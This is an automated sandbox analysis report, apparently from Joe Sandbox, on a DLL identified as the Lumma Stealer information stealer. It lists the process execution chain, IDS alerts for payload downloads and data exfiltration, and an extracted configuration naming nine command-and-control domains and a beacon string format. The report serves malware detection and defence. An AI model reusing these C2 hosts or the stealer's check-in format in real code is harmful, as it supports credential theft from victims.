            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 7720, ParentProcessName: regsvr32.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.cmdline", ProcessId: 7892, ProcessName: csc.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-24T02:18:20.445540+010020283713Unknown Traffic192.168.2.849709172.67.195.241443TCP
            2024-12-24T02:18:20.446008+010020283713Unknown Traffic192.168.2.849710172.67.195.241443TCP
            2024-12-24T02:18:21.489323+010020283713Unknown Traffic192.168.2.849712172.67.195.241443TCP
            2024-12-24T02:18:22.831849+010020283713Unknown Traffic192.168.2.849714172.67.195.241443TCP
            2024-12-24T02:18:23.131739+010020283713Unknown Traffic192.168.2.849715172.67.195.241443TCP
            2024-12-24T02:18:23.478840+010020283713Unknown Traffic192.168.2.849716172.67.195.241443TCP
            2024-12-24T02:18:25.786583+010020283713Unknown Traffic192.168.2.849717172.67.195.241443TCP
            2024-12-24T02:18:26.049767+010020283713Unknown Traffic192.168.2.849718172.67.195.241443TCP
            2024-12-24T02:18:28.029002+010020283713Unknown Traffic192.168.2.849719172.67.195.241443TCP
            2024-12-24T02:18:28.253360+010020283713Unknown Traffic192.168.2.849720172.67.195.241443TCP
            2024-12-24T02:18:30.647319+010020283713Unknown Traffic192.168.2.849721172.67.195.241443TCP
            2024-12-24T02:18:33.014934+010020283713Unknown Traffic192.168.2.849723172.67.195.241443TCP
            2024-12-24T02:18:33.016177+010020283713Unknown Traffic192.168.2.849722172.67.195.241443TCP
            2024-12-24T02:18:35.342680+010020283713Unknown Traffic192.168.2.849724172.67.195.241443TCP
            2024-12-24T02:18:35.354173+010020283713Unknown Traffic192.168.2.849725172.67.195.241443TCP
            2024-12-24T02:18:37.455265+010020283713Unknown Traffic192.168.2.849726172.67.195.241443TCP
            2024-12-24T02:18:38.944428+010020283713Unknown Traffic192.168.2.849727172.67.195.241443TCP
            2024-12-24T02:18:39.726092+010020283713Unknown Traffic192.168.2.849728172.67.195.241443TCP
            2024-12-24T02:18:42.029577+010020283713Unknown Traffic192.168.2.849729172.67.195.241443TCP
            2024-12-24T02:18:44.807871+010020283713Unknown Traffic192.168.2.849730172.67.195.241443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-24T02:18:21.915329+010020546531A Network Trojan was detected192.168.2.849709172.67.195.241443TCP
            2024-12-24T02:18:21.936896+010020546531A Network Trojan was detected192.168.2.849710172.67.195.241443TCP
            2024-12-24T02:18:22.256469+010020546531A Network Trojan was detected192.168.2.849712172.67.195.241443TCP
            2024-12-24T02:18:24.238070+010020546531A Network Trojan was detected192.168.2.849716172.67.195.241443TCP
            2024-12-24T02:18:26.799396+010020546531A Network Trojan was detected192.168.2.849718172.67.195.241443TCP
            2024-12-24T02:18:28.794733+010020546531A Network Trojan was detected192.168.2.849719172.67.195.241443TCP
            2024-12-24T02:18:39.723586+010020546531A Network Trojan was detected192.168.2.849727172.67.195.241443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-24T02:18:21.915329+010020498361A Network Trojan was detected192.168.2.849709172.67.195.241443TCP
            2024-12-24T02:18:21.936896+010020498361A Network Trojan was detected192.168.2.849710172.67.195.241443TCP
            2024-12-24T02:18:22.256469+010020498361A Network Trojan was detected192.168.2.849712172.67.195.241443TCP
            2024-12-24T02:18:26.799396+010020498361A Network Trojan was detected192.168.2.849718172.67.195.241443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-24T02:18:24.238070+010020498121A Network Trojan was detected192.168.2.849716172.67.195.241443TCP
            2024-12-24T02:18:28.794733+010020498121A Network Trojan was detected192.168.2.849719172.67.195.241443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-24T02:18:26.991906+010020480941Malware Command and Control Activity Detected192.168.2.849717172.67.195.241443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-24T02:18:15.825605+010028593771A Network Trojan was detected192.168.2.849706147.45.44.13180TCP
            2024-12-24T02:18:15.882650+010028593771A Network Trojan was detected192.168.2.849707147.45.44.13180TCP
            2024-12-24T02:18:16.547808+010028593771A Network Trojan was detected192.168.2.849706147.45.44.13180TCP
            2024-12-24T02:18:16.621990+010028593771A Network Trojan was detected192.168.2.849707147.45.44.13180TCP
            2024-12-24T02:18:17.508551+010028593771A Network Trojan was detected192.168.2.849708147.45.44.13180TCP
            2024-12-24T02:18:18.493265+010028593771A Network Trojan was detected192.168.2.849708147.45.44.13180TCP
            2024-12-24T02:18:21.702761+010028593771A Network Trojan was detected192.168.2.849711147.45.44.13180TCP
            2024-12-24T02:18:22.428578+010028593771A Network Trojan was detected192.168.2.849711147.45.44.13180TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://volcanoyev.click/api9Avira URL Cloud: Label: malware
            Source: https://volcanoyev.click/apiAvira URL Cloud: Label: malware
            Source: https://volcanoyev.click/Avira URL Cloud: Label: malware
            Source: https://volcanoyev.click/DAvira URL Cloud: Label: malware
            Source: https://volcanoyev.click/4Avira URL Cloud: Label: malware
            Source: https://volcanoyev.click/LAvira URL Cloud: Label: malware
            Source: https://volcanoyev.click:443/apiohrz.default-release/key4.dbPKAvira URL Cloud: Label: malware
            Source: https://volcanoyev.click/eAvira URL Cloud: Label: malware
            Source: volcanoyev.clickAvira URL Cloud: Label: malware
            Source: https://volcanoyev.click:443/apiAvira URL Cloud: Label: malware
            Source: https://volcanoyev.click/apiSaAvira URL Cloud: Label: malware
            Source: https://volcanoyev.click/apinAvira URL Cloud: Label: malware
            Source: https://volcanoyev.click/apiUAvira URL Cloud: Label: malware
            Source: https://volcanoyev.click/k?Avira URL Cloud: Label: malware
            Source: https://volcanoyev.click/YAvira URL Cloud: Label: malware
            Source: https://volcanoyev.click/WAvira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.dllAvira: detection malicious, Label: HEUR/AGEN.1300034
            Source: C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.dllAvira: detection malicious, Label: HEUR/AGEN.1300034
            Source: C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.dllAvira: detection malicious, Label: HEUR/AGEN.1300034
            Found malware configuration
            Source: 27.2.powershell.exe.4d4efe8.2.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["rapeflowwj.lat", "crosshuaht.lat", "volcanoyev.click", "energyaffai.lat", "aspecteirs.lat", "necklacebudi.lat", "grannyejh.lat", "sustainskelet.lat", "discokeyus.lat"], "Build id": "VC6Dfm--Loader2"}
            Multi AV Scanner detection for submitted file
            Source: iviewers.dllVirustotal: Detection: 38%Perma Link
            Source: iviewers.dllReversingLabs: Detection: 36%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.dllJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.dllJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.dllJoe Sandbox ML: detected
            Sample uses string decryption to hide its real strings
            Source: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
            Source: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: crosshuaht.lat
            Source: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: sustainskelet.lat
            Source: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: aspecteirs.lat
            Source: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: energyaffai.lat
            Source: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: necklacebudi.lat
            Source: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: discokeyus.lat
            Source: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: grannyejh.lat
            Source: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: volcanoyev.click
            Source: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
            Source: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
            Source: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
            Source: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
            Source: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: VC6Dfm--Loader2
            Source: iviewers.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49716 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49717 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49718 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49719 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49721 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49723 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49722 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49724 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49725 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49726 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49727 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49728 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49729 version: TLS 1.2
            Source: iviewers.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.pdb source: powershell.exe, 0000001B.00000002.1650397592.0000000004D20000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.pdb source: powershell.exe, 0000000F.00000002.1629065195.0000000006DEA000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.pdb source: powershell.exe, 0000000D.00000002.1589335298.00000000058FC000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.pdb source: powershell.exe, 0000000F.00000002.1605796075.0000000004C02000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.pdb source: loaddll32.exe, 00000000.00000002.1679599025.0000000002731000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.pdb source: rundll32.exe, 00000005.00000002.1636762344.00000000051F1000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.pdb source: regsvr32.exe, 00000004.00000002.1626426593.00000000046C1000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.pdb@\ source: loaddll32.exe, 00000000.00000002.1679599025.0000000002731000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.pdb source: powershell.exe, 00000014.00000002.1570488674.00000000055FD000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: q8C:\Users\user\AppData\Local\Temp\shgzzqqc\shgzzqqc.pdb source: rundll32.exe, 00000006.00000002.1588613450.0000000004761000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.pdb9&7v source: powershell.exe, 00000014.00000002.1579325198.00000000079E6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.pdb8'8w source: powershell.exe, 00000014.00000002.1579325198.00000000079E6000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: number of queries: 2002

            Software Vulnerabilities

            barindex
            Suspicious execution chain found
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h]31_2_0043C767
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax31_2_0042984F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]31_2_00423860
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, ecx31_2_00438810
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh31_2_00438810
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh31_2_00438810
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then test eax, eax31_2_00438810
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al31_2_0041682D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]31_2_0041682D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]31_2_0041682D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ecx], bp31_2_0041D83A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push C0BFD6CCh31_2_00423086
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push C0BFD6CCh31_2_00423086
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]31_2_0042B170
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+00000080h]31_2_004179C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h31_2_0043B1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, eax31_2_0043B1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ecx], dx31_2_004291DD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]31_2_004291DD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, eax31_2_00405990
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebp, eax31_2_00405990
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, esi31_2_00422190
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ebx], cx31_2_00422190
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h31_2_00422190
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], cl31_2_0042CA49
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [esi], al31_2_0042DA53
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]31_2_00416263
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]31_2_00415220
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push esi31_2_00427AD3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], cl31_2_0042CAD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ebx], ax31_2_0041B2E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push ebx31_2_0043CA93
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx31_2_0041CB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [esi], cx31_2_0041CB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx31_2_00428B61
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], cl31_2_0042CB11
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], cl31_2_0042CB22
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]31_2_0043F330
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, eax31_2_0040DBD9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, eax31_2_0040DBD9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]31_2_00417380
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h31_2_0041D380
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp al, 2Eh31_2_00426B95
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]31_2_00435450
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]31_2_00417380
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push 00000000h31_2_00429C2B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ecx], dx31_2_004291DD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]31_2_004291DD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]31_2_004074F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]31_2_004074F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]31_2_0043ECA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h31_2_004385E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax31_2_004385E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]31_2_00417DEE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax31_2_00409580
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ebp+00h], ax31_2_00409580
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp dword ptr [0044450Ch]31_2_00418591
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-68h]31_2_00428D93
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then xor edi, edi31_2_0041759F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [0044473Ch]31_2_0041C653
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, ebp31_2_00425E70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp dword ptr [004455F4h]31_2_00425E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax31_2_0043AEC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then xor byte ptr [esp+eax+17h], al31_2_00408F50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], bl31_2_00408F50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]31_2_0042A700
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then lea edx, dword ptr [ecx+01h]31_2_0040B70C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [esi], al31_2_0041BF14
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebx+edi+44h]31_2_00419F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h]31_2_0041E7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, word ptr [edx]31_2_004197C2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [edi], dx31_2_004197C2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [esi], cx31_2_004197C2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, ebx31_2_0042DFE9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx31_2_0040BFFD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov esi, eax31_2_00415799
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax31_2_00415799
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]31_2_0043EFB0

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2859377 - Severity 1 - ETPRO MALWARE Generic Powershell Loader Requesting Additional Payloads (GET) : 192.168.2.8:49708 -> 147.45.44.131:80
            Source: Network trafficSuricata IDS: 2859377 - Severity 1 - ETPRO MALWARE Generic Powershell Loader Requesting Additional Payloads (GET) : 192.168.2.8:49706 -> 147.45.44.131:80
            Source: Network trafficSuricata IDS: 2859377 - Severity 1 - ETPRO MALWARE Generic Powershell Loader Requesting Additional Payloads (GET) : 192.168.2.8:49707 -> 147.45.44.131:80
            Source: Network trafficSuricata IDS: 2859377 - Severity 1 - ETPRO MALWARE Generic Powershell Loader Requesting Additional Payloads (GET) : 192.168.2.8:49711 -> 147.45.44.131:80
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49710 -> 172.67.195.241:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49710 -> 172.67.195.241:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49712 -> 172.67.195.241:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49712 -> 172.67.195.241:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49718 -> 172.67.195.241:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49709 -> 172.67.195.241:443
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49716 -> 172.67.195.241:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49716 -> 172.67.195.241:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49718 -> 172.67.195.241:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49717 -> 172.67.195.241:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49709 -> 172.67.195.241:443
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49719 -> 172.67.195.241:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49719 -> 172.67.195.241:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49727 -> 172.67.195.241:443
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: rapeflowwj.lat
            Source: Malware configuration extractorURLs: crosshuaht.lat
            Source: Malware configuration extractorURLs: volcanoyev.click
            Source: Malware configuration extractorURLs: energyaffai.lat
